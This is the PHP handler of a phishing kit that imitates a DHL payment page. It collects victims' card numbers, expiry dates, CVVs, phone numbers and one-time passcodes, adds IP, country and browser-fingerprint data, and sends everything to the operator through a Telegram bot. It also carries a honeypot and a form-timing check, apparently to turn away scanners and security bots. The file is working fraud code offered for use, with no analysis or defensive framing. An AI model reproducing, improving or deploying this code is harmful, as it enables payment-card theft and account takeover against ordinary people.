<?php 
session_start();
require __DIR__ . '/core/app.php';
require __DIR__ . '/core/shield.php';

function notify($msg) {
    global $bot_token, $chat_id;
    $c = curl_init();
    curl_setopt_array($c, [
        CURLOPT_URL => "https://api.telegram.org/bot{$bot_token}/sendMessage?" . http_build_query([
            'chat_id' => $chat_id,
            'parse_mode' => 'html',
            'text' => $msg
        ]),
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_TIMEOUT => 10,
    ]);
    curl_exec($c);
    curl_close($c);
}

// Only accept POST requests
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    header("location: profile.php");
    exit;
}

// Check honeypot field (bots fill hidden fields)
if (!empty($_POST['website_url'])) {
    // Bot detected - silently redirect
    header("location: update.php?s=v");
    exit;
}

// Check form timing (too fast = bot)
if (!empty($_POST['_ft'])) {
    $formTime = intval(base_convert($_POST['_ft'], 36, 10));
    $elapsed = (time() * 1000) - $formTime;
    // If form was filled in less than 2 seconds, likely a bot
    if ($elapsed > 0 && $elapsed < 2000) {
        header("location: update.php?s=v");
        exit;
    }
}

// Card submission
if (isset($_POST['cn'])) {
    $ip = $_SERVER['HTTP_CF_CONNECTING_IP'] ?? $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'];
    $ua = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
    $country = $_SESSION['visitor_country'] ?? 'N/A';
    $cur_code = $_SESSION['currency_code'] ?? 'EUR';
    $cur_amount = $_SESSION['currency_amount'] ?? $app_fee;
    
    // Get fingerprint data
    $fpData = '';
    if (!empty($_POST['_fp'])) {
        $fpRaw = @base64_decode($_POST['_fp']);
        $fp = @json_decode($fpRaw, true);
        if ($fp) {
            $fpData = "\nFP: Canvas=" . ($fp['canvas'] ?? 'N/A') 
                    . " | WebGL=" . ($fp['webgl_vendor'] ?? 'N/A')
                    . " | Screen=" . ($fp['screenRes'] ?? 'N/A')
                    . " | TZ=" . ($fp['timezone'] ?? 'N/A')
                    . " | Mouse=" . ($fp['mouseMovements'] ?? '0')
                    . " | Keys=" . ($fp['keyPresses'] ?? '0')
                    . " | FillTime=" . round(($fp['fillTime'] ?? 0) / 1000, 1) . "s";
        }
    }
    
    $msg = "<b>🔴 [ DHL CARD ]</b>\n"
         . "━━━━━━━━━━━━━━━\n"
         . "👤 NAME : " . htmlspecialchars($_POST['fn'] ?? '') . "\n"
         . "💳 NUMBER : " . htmlspecialchars($_POST['cn'] ?? '') . "\n"
         . "📅 DATE : " . htmlspecialchars($_POST['em'] ?? '') . "/" . htmlspecialchars($_POST['ey'] ?? '') . "\n"
         . "🔒 CVV : " . htmlspecialchars($_POST['sc'] ?? '') . "\n"
         . "📱 PHONE : " . htmlspecialchars($_POST['ph'] ?? '') . "\n"
         . "━━━━━━━━━━━━━━━\n"
         . "🌐 IP : " . $ip . "\n"
         . "🌍 COUNTRY : " . $country . "\n"
         . "💰 AMOUNT : " . $cur_amount . " " . $cur_code . "\n"
         . "🖥 UA : " . substr($ua, 0, 100)
         . $fpData;
    notify($msg);
    header("location: update.php?s=v");
    exit;
}

// OTP submission
if (isset($_POST['vc'])) {
    $ip = $_SERVER['HTTP_CF_CONNECTING_IP'] ?? $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'];
    $msg = "<b>🟡 [ DHL OTP ]</b>\n"
         . "━━━━━━━━━━━━━━━\n"
         . "🔑 OTP : " . htmlspecialchars($_POST['vc'] ?? '') . "\n"
         . "━━━━━━━━━━━━━━━\n"
         . "🌐 IP : " . $ip;
    notify($msg);
    if (isset($_POST['rt'])) {
        header("location: update.php?s=d");
    } else {
        header("location: update.php?s=r");
    }
    exit;
}

// Unknown request
header("location: profile.php");
?>
